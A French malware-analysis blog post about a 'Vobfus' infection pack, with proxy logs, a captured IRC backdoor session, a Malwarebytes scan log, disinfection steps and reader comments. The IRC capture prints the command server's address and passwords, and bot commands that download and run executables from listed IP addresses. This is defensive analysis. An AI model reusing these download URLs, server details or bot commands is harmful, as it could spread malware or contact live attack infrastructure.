1306233860.494     82 192.168.1.27 TCP_MISS/302 462 GET http://prioset.org/dw/dw.php?id=1CC19F6453407CE&ver=dm1&tp=p - DIRECT/95.211.72.209 text/html
1306233861.705     76 192.168.1.27 TCP_MISS/200 350 GET http://comcmdrun.com/dw/dw.php?id=1-1CC19F739714D88&ver=dm1&tp=d - DIRECT/95.211.72.209 text/html
1306233862.988  63103 192.168.1.27 TCP_MISS/504 1515 POST http://68.60.106.144/s/ - DIRECT/68.60.106.144 text/html

Le rogue fait parti d’une famille connue qui est effectivement très active ces derniers jours :  Win32/FakeRean 33 en 1

 

Vofbus : méga pack Vofbus : méga pack

La Backdoor IRC est aussi connue :

Vofbus : méga pack
Quelques exemples du traffic générée par la Backdoor IRC :

U 207.46.232.182:123 -> 192.168.1.27:123
 .........../..F@...tI......... ........V.......V                                                                                                                                         
######
T 192.168.1.27:1170 -> 59.53.91.167:3801 [AP]
 PASS hax0r..                                                                                                                                                                             
#
T 192.168.1.27:1170 -> 59.53.91.167:3801 [AP]
 PASS hax0r..                                                                                                                                                                             
#
T 59.53.91.167:3801 -> 192.168.1.27:1170 [A]
 ......                                                                                                                                                                                   
#
T 192.168.1.27:1170 -> 59.53.91.167:3801 [AP]
 KCIK {FR|XPa}luauzzu..RSSR luauzzu 0 0 :luauzzu..                                                                                                                                        
#
T 192.168.1.27:1170 -> 59.53.91.167:3801 [AP]
 KCIK {FR|XPa}luauzzu..RSSR luauzzu 0 0 :luauzzu..                                                                                                                                        
#
T 59.53.91.167:3801 -> 192.168.1.27:1170 [A]
 ......                                                                                                                                                                                   
#
T 59.53.91.167:3801 -> 192.168.1.27:1170 [AP]
 :IRC!IRC@hub.us.com PRIVMSG {FR|XPa}luauzzu :.VERSION...:hub.us.com 001 {FR|XPa}luauzzu :us, {FR|XPa}luauzzu!luauzzu@AMontsouris-152-1-44-236.w82-123.abo.wanadoo.fr..:..:hub.us.com 005 
 {FR|XPa}luauzzu ..:{FR|XPa}luauzzu!luauzzu@xxxx.wanadoo.fr JOIN :#dpi..:hub.us.com 332 {FR|XPa}luauzzu #dpi :.dl http://91.200.241.40/999.exe .dl http://
 96.44.181.226/images/3383.exe .dl http://91.200.241.40/bnet.exe..:hub.us.com 333 {FR|XPa}luauzzu #dpi ND23 1305679807..:hub.us.com 353 {FR|XPa}luauzzu @ #dpi :{FR|XPa}luauzzu ..........
 ................................................................                                                                                                                         
#
T 192.168.1.27:1170 -> 59.53.91.167:3801 [AP]
 SEND #ng ng00..                                                                                                                                                                          
#
T 192.168.1.27:1170 -> 59.53.91.167:3801 [AP]
 SEND #ng ng00..                                                                                                                                                                          
#
T 59.53.91.167:3801 -> 192.168.1.27:1170 [AP]
 :{FR|XPa}luauzzu!luauzzu@AMontsouris-152-1-44-236.w82-123.abo.wanadoo.fr JOIN :#ng..:hub.us.com 332 {FR|XPa}luauzzu #ng :.dl http://91.200.241.40/nw1jdcbhs.exe..:hub.us.com 333 {FR|XPa}
 luauzzu #ng ND87 1306161701..:hub.us.com 353 {FR|XPa}luauzzu @ #ng :{FR|XPa}luauzzu ..........................................................................                           
###
T 192.168.1.27:1170 -> 59.53.91.167:3801 [AP]
 PRIVMSG #ng :[d="http://91.200.241.40/999.exe" s="33792 bytes"] Executed file "C:\Documents and Settings\Mak\Application Data\1.tmp" - Download retries: 0..                             
#
T 192.168.1.27:1170 -> 59.53.91.167:3801 [AP]
 PRIVMSG #ng :[d="http://91.200.241.40/999.exe" s="33792 bytes"] Executed file "C:\Documents and Settings\Mak\Application Data\1.tmp" - Download retries: 0..                             
#
T 59.53.91.167:3801 -> 192.168.1.27:1170 [AP]
 ......                                                                                                                                                                                   
########
T 192.168.1.27:1179 -> 59.63.157.62:6939 [AP]
 PASS laorosr..                                                                                                                                                                           
#
T 192.168.1.27:1179 -> 59.63.157.62:6939 [AP]
 PASS laorosr..                                                                                                                                                                           
#
T 192.168.1.27:1170 -> 59.53.91.167:3801 [AP]
 PRIVMSG #ng :[d="http://96.44.181.226/images/3383.exe" s="27648 bytes"] Executed file "C:\Documents and Settings\Mak\Application Data\2.tmp" - Download retries: 0..                     
#
T 192.168.1.27:1170 -> 59.53.91.167:3801 [AP]
 PRIVMSG #ng :[d="http://96.44.181.226/images/3383.exe" s="27648 bytes"] Executed file "C:\Documents and Settings\Mak\Application Data\2.tmp" - Download retries: 0..                     
#
###
T 192.168.1.27:1179 -> 59.63.157.62:6939 [AP]
 PRRVMSG #i :HTTP SET http://31.184.237.32/b.exe..                                                                                                                                        
#
T 192.168.1.27:1179 -> 59.63.157.62:6939 [AP]
 PRRVMSG #i :HTTP SET http://31.184.237.32/b.exe.. 
T 192.168.1.27:1170 -> 59.53.91.167:3801 [AP]
 PRIVMSG #ng :[d="http://91.200.241.40/nw1jdcbhs.exe" s="59478 bytes"] Executed file "C:\Documents and Settings\Mak\Application Data\4.tmp" - Download retries: 0..                       
#
T 192.168.1.27:1170 -> 59.53.91.167:3801 [AP]
 PRIVMSG #ng :[d="http://91.200.241.40/nw1jdcbhs.exe" s="59478 bytes"] Executed file "C:\Documents and Settings\Mak\Application Data\4.tmp" - Download retries: 0..                       
#
T 59.53.91.167:3801 -> 192.168.1.27:1170 [AP]

On notera aussi que la machine SPAM, néanmoins, la backdoor effectuant des scans assez brutals afin de trouver des machines ayant des vulnérabilités à distance, la connexion internet peut être très ralenti voir ne pas fonctionner.
Le nombre de SPAM envoyé est alors assez faible, le scan de la backdoor ralentissant tout.

 

Vofbus : méga pack

Vofbus : méga pack Quelques conseils de désinfection pour ce pack

La connexion internet peut ne pas fonctionner, il est conseillé de passer Malwarebyte en mode sans échec avec prise en charge du réseau, une bonne partie du pack malicieux ne sera pas actif.
Pour cela, redémarrer l’ordinateur, avant le logo Windows, tapoter sur la touche F8, un menu va apparaître, choisisser Mode sans échec avec prise en charge du réseau et appuyer sur la touche entrée du clavier.

Utiliser RogueKiller pour supprimer le rogue qui peux empécher l’utilisation de Malwarebyte.

A l’issu du scan avec Malwarebyte, vous devez obtenir quelque chose comme ceci :

Malwarebytes' Anti-Malware 1.50.1.1100
www.malwarebytes.org

Version de la base de données: 6661

Windows 5.1.2600 Service Pack 2
Internet Explorer 6.0.2900.2180

24/05/2011 13:46:18
mbam-log-2011-05-24 (13-46-14).txt

Type d'examen: Examen rapide
Elément(s) analysé(s): 131616
Temps écoulé: 3 minute(s), 31 seconde(s)

Processus mémoire infecté(s): 2
Module(s) mémoire infecté(s): 2
Clé(s) du Registre infectée(s): 8
Valeur(s) du Registre infectée(s): 51
Elément(s) de données du Registre infecté(s): 9
Dossier(s) infecté(s): 3
Fichier(s) infecté(s): 55

Processus mémoire infecté(s):
c:\documents and settings\Mak\application data\F.tmp (Trojan.Proxy) -> 3880 -> No action taken.
c:\documents and settings\Mak\local settings\application data\vrw.exe (Trojan.FakeAlert) -> 3256 -> No action taken.

Module(s) mémoire infecté(s):
c:\WINDOWS\system32\jb6xrjo.dll (Trojan.Ertfor) -> No action taken.
c:\WINDOWS\system32\uqmcbwbu.dll (IPH.GenericBHO) -> No action taken.

Clé(s) du Registre infectée(s):
HKEY_CLASSES_ROOT\CLSID\{24A123C3-A500-99BD-A120-04B53A2C8952} (Trojan.Ertfor) -> No action taken.
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{24A123C3-A500-99BD-A120-04B53A2C8952} (Trojan.Ertfor) -> No action taken.
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Ext\Stats\{24A123C3-A500-99BD-A120-04B53A2C8952} (Trojan.Ertfor) -> No action taken.
HKEY_CLASSES_ROOT\CLSID\{F569D725-C1CC-4A9F-4B6E-9923A41BB8F9} (IPH.GenericBHO) -> No action taken.
HKEY_CLASSES_ROOT\Tvsoabov (IPH.GenericBHO) -> No action taken.
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{F569D725-C1CC-4A9F-4B6E-9923A41BB8F9} (IPH.GenericBHO) -> No action taken.
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Ext\Stats\{F569D725-C1CC-4A9F-4B6E-9923A41BB8F9} (IPH.GenericBHO) -> No action taken.
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\SETUP.EXE (Malware.Packer.Gen) -> No action taken.

Valeur(s) du Registre infectée(s):
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\SharedTaskScheduler\{24A123C3-A500-99BD-A120-04B53A2C8952} (Trojan.Ertfor) -> Value: {24A123C3-A500-99BD-A120-04B53A2C8952} -> No action taken.
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\HNUdHTgqO (Malware.Packer.Gen) -> Value: HNUdHTgqO -> No action taken.
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\HNUdHTgqO (Malware.Packer.Gen) -> Value: HNUdHTgqO -> No action taken.
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Microsoft Driver Setup (Malware.Gen) -> Value: Microsoft Driver Setup -> No action taken.
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\Microsoft Driver Setup (Malware.Gen) -> Value: Microsoft Driver Setup -> No action taken.
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\MKfre (Malware.Packer.Gen) -> Value: MKfre -> No action taken.
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\MKfre (Malware.Packer.Gen) -> Value: MKfre -> No action taken.
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\HNUdHTgoA (Malware.Packer.Gen) -> Value: HNUdHTgoA -> No action taken.
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\HNUdHTgoA (Malware.Packer.Gen) -> Value: HNUdHTgoA -> No action taken.
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\MKfsc (Malware.Packer.Gen) -> Value: MKfsc -> No action taken.
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\MKfsc (Malware.Packer.Gen) -> Value: MKfsc -> No action taken.
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\MKZe (Malware.Packer.Gen) -> Value: MKZe -> No action taken.
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\MKZe (Malware.Packer.Gen) -> Value: MKZe -> No action taken.
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\MKeg (Malware.Packer.Gen) -> Value: MKeg -> No action taken.
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\MKeg (Malware.Packer.Gen) -> Value: MKeg -> No action taken.
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\HNUdHTgrA (Malware.Packer.Gen) -> Value: HNUdHTgrA -> No action taken.
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\HNUdHTgrA (Malware.Packer.Gen) -> Value: HNUdHTgrA -> No action taken.
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\MKctc (Malware.Packer.Gen) -> Value: MKctc -> No action taken.
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\MKctc (Malware.Packer.Gen) -> Value: MKctc -> No action taken.
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\MKZSc (Malware.Packer.Gen) -> Value: MKZSc -> No action taken.
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\MKZSc (Malware.Packer.Gen) -> Value: MKZSc -> No action taken.
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\MKeuf (Malware.Packer.Gen) -> Value: MKeuf -> No action taken.
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\MKeuf (Malware.Packer.Gen) -> Value: MKeuf -> No action taken.
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\MKee (Malware.Packer.Gen) -> Value: MKee -> No action taken.
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\MKee (Malware.Packer.Gen) -> Value: MKee -> No action taken.
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\HNUdHTgre (Malware.Packer.Gen) -> Value: HNUdHTgre -> No action taken.
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\HNUdHTgre (Malware.Packer.Gen) -> Value: HNUdHTgre -> No action taken.
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\HNUdHTgpta (Malware.Packer.Gen) -> Value: HNUdHTgpta -> No action taken.
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\HNUdHTgpta (Malware.Packer.Gen) -> Value: HNUdHTgpta -> No action taken.
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\HNUdHTgrsc (Malware.Packer.Gen) -> Value: HNUdHTgrsc -> No action taken.
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\HNUdHTgrsc (Malware.Packer.Gen) -> Value: HNUdHTgrsc -> No action taken.
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\MKcrc (Malware.Packer.Gen) -> Value: MKcrc -> No action taken.
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\MKcrc (Malware.Packer.Gen) -> Value: MKcrc -> No action taken.
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\MKcZ (Malware.Packer.Gen) -> Value: MKcZ -> No action taken.
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\MKcZ (Malware.Packer.Gen) -> Value: MKcZ -> No action taken.
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\HNUdHTgph (Malware.Packer.Gen) -> Value: HNUdHTgph -> No action taken.
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\HNUdHTgph (Malware.Packer.Gen) -> Value: HNUdHTgph -> No action taken.
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\HNUdHTgoe (Malware.Packer.Gen) -> Value: HNUdHTgoe -> No action taken.
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\HNUdHTgoe (Malware.Packer.Gen) -> Value: HNUdHTgoe -> No action taken.
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\HNUdHTgl/ (Malware.Packer.Gen) -> Value: HNUdHTgl/ -> No action taken.
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\HNUdHTgl/ (Malware.Packer.Gen) -> Value: HNUdHTgl/ -> No action taken.
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\MKcuc (Malware.Packer.Gen) -> Value: MKcuc -> No action taken.
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\MKcuc (Malware.Packer.Gen) -> Value: MKcuc -> No action taken.
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\12CFG214-K641-12SF-N85P (Trojan.Downloader) -> Value: 12CFG214-K641-12SF-N85P -> No action taken.
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\tuozeu (Heuristics.Shuriken) -> Value: tuozeu -> No action taken.
HKEY_CLASSES_ROOT\.exe\shell\open\command\(default) (Hijack.ExeFile) -> Value: (default) -> No action taken.
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\WINID (Malware.Trace) -> Value: WINID -> No action taken.
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\idstrf (Malware.Trace) -> Value: idstrf -> No action taken.
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFolderOptions (Hijack.FolderOptions) -> Value: NoFolderOptions -> No action taken.
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\engel (Backdoor.Agent) -> Value: engel -> No action taken.
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Taskman (Trojan.Agent) -> Value: Taskman -> No action taken.

Elément(s) de données du Registre infecté(s):
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Taskman (Malware.Gen) -> Bad: (c:\RECYCLER\R-1-5-21-1482476501-1644491937-682003330-1013\acleaner.exe) Good: () -> No action taken.
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools (PUM.Hijack.Regedit) -> Bad: (1) Good: (0) -> No action taken.
HKEY_LOCAL_MACHINE\SOFTWARE\Clients\StartMenuInternet\FIREFOX.EXE\shell\open\command\(default) (Hijack.StartMenuInternet) -> Bad: ("C:\Documents and Settings\Mak\Local Settings\Application Data\vrw.exe" -a "C:\Program Files\Mozilla Firefox\firefox.exe") Good: (firefox.exe) -> No action taken.
HKEY_LOCAL_MACHINE\SOFTWARE\Clients\StartMenuInternet\FIREFOX.EXE\shell\safemode\command\(default) (Hijack.StartMenuInternet) -> Bad: ("C:\Documents and Settings\Mak\Local Settings\Application Data\vrw.exe" -a "C:\Program Files\Mozilla Firefox\firefox.exe" -safe-mode) Good: (firefox.exe -safe-mode) -> No action taken.
HKEY_LOCAL_MACHINE\SOFTWARE\Clients\StartMenuInternet\IEXPLORE.EXE\shell\open\command\(default) (Hijack.StartMenuInternet) -> Bad: ("C:\Documents and Settings\Mak\Local Settings\Application Data\vrw.exe" -a "C:\Program Files\Intern) Good: (iexplore.exe) -> No action taken.
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center\AntiVirusDisableNotify (PUM.Disabled.SecurityCenter) -> Bad: (1) Good: (0) -> No action taken.
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center\FirewallDisableNotify (PUM.Disabled.SecurityCenter) -> Bad: (1) Good: (0) -> No action taken.
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center\UpdatesDisableNotify (PUM.Disabled.SecurityCenter) -> Bad: (1) Good: (0) -> No action taken.
HKEY_CLASSES_ROOT\exefile\shell\open\command\(default) (Broken.OpenCommand) -> Bad: ("C:\Documents and Settings\Mak\Local Settings\Application Data\vrw.exe" -a "%1" %*) Good: ("%1" %*) -> No action taken.

Dossier(s) infecté(s):
c:\RECYCLER\s-1-5-21-0243936033-3052116371-381863308-1811 (Trojan.Agent) -> No action taken.
c:\WINDOWS\system32\lowsec (Stolen.data) -> No action taken.
c:\RECYCLER\r-1-5-21-1482476501-1644491937-682003330-1013 (Worm.AutoRun.Gen) -> No action taken.

Fichier(s) infecté(s):
c:\WINDOWS\system32\jb6xrjo.dll (Trojan.Ertfor) -> No action taken.
c:\documents and settings\Mak\application data\F.tmp (Trojan.Proxy) -> No action taken.
c:\documents and settings\Mak\local settings\application data\vrw.exe (Trojan.FakeAlert) -> No action taken.
c:\WINDOWS\system32\uqmcbwbu.dll (IPH.GenericBHO) -> No action taken.
c:\documents and settings\Mak\local settings\Temp\tje8p.exe (Malware.Packer.Gen) -> No action taken.
c:\WINDOWS\aadrive32.exe (Malware.Gen) -> No action taken.
c:\WINDOWS\wininst.exe (Malware.Packer.Gen) -> No action taken.
c:\documents and settings\Mak\local settings\Temp\avp32.exe (Malware.Packer.Gen) -> No action taken.
c:\WINDOWS\winlogon.exe (Malware.Packer.Gen) -> No action taken.
c:\WINDOWS\avp.exe (Malware.Packer.Gen) -> No action taken.
c:\WINDOWS\smss.exe (Malware.Packer.Gen) -> No action taken.
c:\documents and settings\Mak\local settings\Temp\win32.exe (Malware.Packer.Gen) -> No action taken.
c:\WINDOWS\msmgm.exe (Malware.Packer.Gen) -> No action taken.
c:\WINDOWS\avp32.exe (Malware.Packer.Gen) -> No action taken.
c:\WINDOWS\spoolsv.exe (Malware.Packer.Gen) -> No action taken.
c:\WINDOWS\user.exe (Malware.Packer.Gen) -> No action taken.
c:\documents and settings\Mak\local settings\Temp\smss.exe (Malware.Packer.Gen) -> No action taken.
c:\documents and settings\Mak\local settings\Temp\services.exe (Malware.Packer.Gen) -> No action taken.
c:\documents and settings\Mak\local settings\Temp\winlogon.exe (Malware.Packer.Gen) -> No action taken.
c:\WINDOWS\login.exe (Malware.Packer.Gen) -> No action taken.
c:\WINDOWS\mdm.exe (Malware.Packer.Gen) -> No action taken.
c:\documents and settings\Mak\local settings\Temp\setup.exe (Malware.Packer.Gen) -> No action taken.
c:\documents and settings\Mak\local settings\Temp\avp.exe (Malware.Packer.Gen) -> No action taken.
c:\documents and settings\Mak\local settings\Temp\gdi32.exe (Malware.Packer.Gen) -> No action taken.
c:\WINDOWS\lsass.exe (Malware.Packer.Gen) -> No action taken.
c:\RECYCLER\s-1-5-21-0243936033-3052116371-381863308-1811\vsbntlo.exe (Trojan.Downloader) -> No action taken.
c:\documents and settings\Mak\tuozeu.exe (Heuristics.Shuriken) -> No action taken.
c:\RECYCLER\r-1-5-21-1482476501-1644491937-682003330-1013\acleaner.exe (Malware.Gen) -> No action taken.
c:\documents and settings\Mak\application data\10.tmp (Trojan.Downloader) -> No action taken.
c:\documents and settings\Mak\application data\11.tmp (Malware.Gen) -> No action taken.
c:\documents and settings\Mak\application data\2.tmp (Trojan.Proxy) -> No action taken.
c:\documents and settings\Mak\application data\3.tmp (Trojan.Downloader) -> No action taken.
c:\documents and settings\Mak\application data\4.tmp (Malware.Gen) -> No action taken.
c:\documents and settings\Mak\application data\4E.tmp (Trojan.Proxy) -> No action taken.
c:\documents and settings\Mak\application data\4F.tmp (Trojan.Downloader) -> No action taken.
c:\documents and settings\Mak\application data\5.tmp (Trojan.Proxy) -> No action taken.
c:\documents and settings\Mak\application data\50.tmp (Malware.Gen) -> No action taken.
c:\documents and settings\Mak\application data\6.tmp (Trojan.Downloader) -> No action taken.
c:\documents and settings\Mak\application data\7.tmp (Malware.Gen) -> No action taken.
c:\documents and settings\Mak\application data\8.tmp (Trojan.Proxy) -> No action taken.
c:\documents and settings\Mak\application data\9.tmp (Trojan.Proxy) -> No action taken.
c:\documents and settings\Mak\application data\A.tmp (Trojan.Downloader) -> No action taken.
c:\documents and settings\Mak\application data\B.tmp (Malware.Gen) -> No action taken.
c:\documents and settings\Mak\application data\C.tmp (Trojan.Downloader) -> No action taken.
c:\documents and settings\Mak\application data\D.tmp (Malware.Gen) -> No action taken.
c:\documents and settings\mak\application data\xbvmvj.exe (Malware.Gen) -> No action taken.
c:\documents and settings\Mak\Bureau\test (Malware.Gen) -> No action taken.
c:\documents and settings\Mak\local settings\Temp\E.tmp (Rootkit.TDSS) -> No action taken.
c:\documents and settings\Mak\local settings\Temp\lq2nx49orufbhdi2.exe (Malware.Packer.Gen) -> No action taken.
c:\WINDOWS\Temp\eais\setup.exe (Trojan.Downloader) -> No action taken.
c:\documents and settings\Mak\dgjdd.exe (Malware.Gen) -> No action taken.
c:\RECYCLER\s-1-5-21-0243936033-3052116371-381863308-1811\Desktop.ini (Trojan.Agent) -> No action taken.
c:\WINDOWS\system32\lowsec\local.ds (Stolen.data) -> No action taken.
c:\WINDOWS\system32\lowsec\user.ds (Stolen.data) -> No action taken.
c:\RECYCLER\r-1-5-21-1482476501-1644491937-682003330-1013\Desktop.ini (Worm.AutoRun.Gen) -> No action taken.

Malwarebyte prends en charge la majorité des malwares (Trojan.Ertfor, Trojan.Vobfus, Backdoor.Win32.Floder).

Vobfus réinstalle TDSS/Alueron à chaque démarrage, vous devez avoir tuer Vobfus avant de passer TDSSKiller.

Enfin nettoyer vos clefs USB avec USBFix pour ne pas réinfecter l’ordinateur.

Comment lire d'autres tutoriels de malekal.com ?

Si le site vous a aidé, svp, débloquez les bloqueurs de publicités, n'hésitez pas non plus à partager l'article ou le site sur les réseaux sociaux.

Pour pouvoir lire plus d'articles et tutoriels, utilisez le menu en haut du site. Plein d'articles et tutos utiles vous attendent !

Besoin d'aide ?

Posez votre question ou soumettez votre problème sur le forum malekal.com pour obtenir une aide efficace : Aller sur le forum malekal.com
(Visited 37 times, 1 visits today)

5 thoughts on “Vofbus : méga pack

  1. Bonjour Malekal,

    Je me permet de faire un rapide commentaire. Je n’y connais pas grand chose en informatique, mais en regardant le log Hijackthis j’ai vu que la VM utilisée tournait sous IE 6… je me demande donc pourquoi faire les test avec un tel navigateur et pas un autre type FF ou IE8 …

    merci d’avance.

  2. Je suis sidéré par le fait qu’aucun antivirus de virustotal n’ait pas détecté un seul malware de ce pack… mais peut-être parce que ces malwares ne sont pas à proprement parler des virus?..

  3. @malekalmorte:
    ok et sur la page que tu indiques, le lien de téléchargement, ce n’est pas un fix, c’est bien un fichier contaminé?

Laisser un commentaire

Votre adresse de messagerie ne sera pas publiée. Les champs obligatoires sont indiqués avec *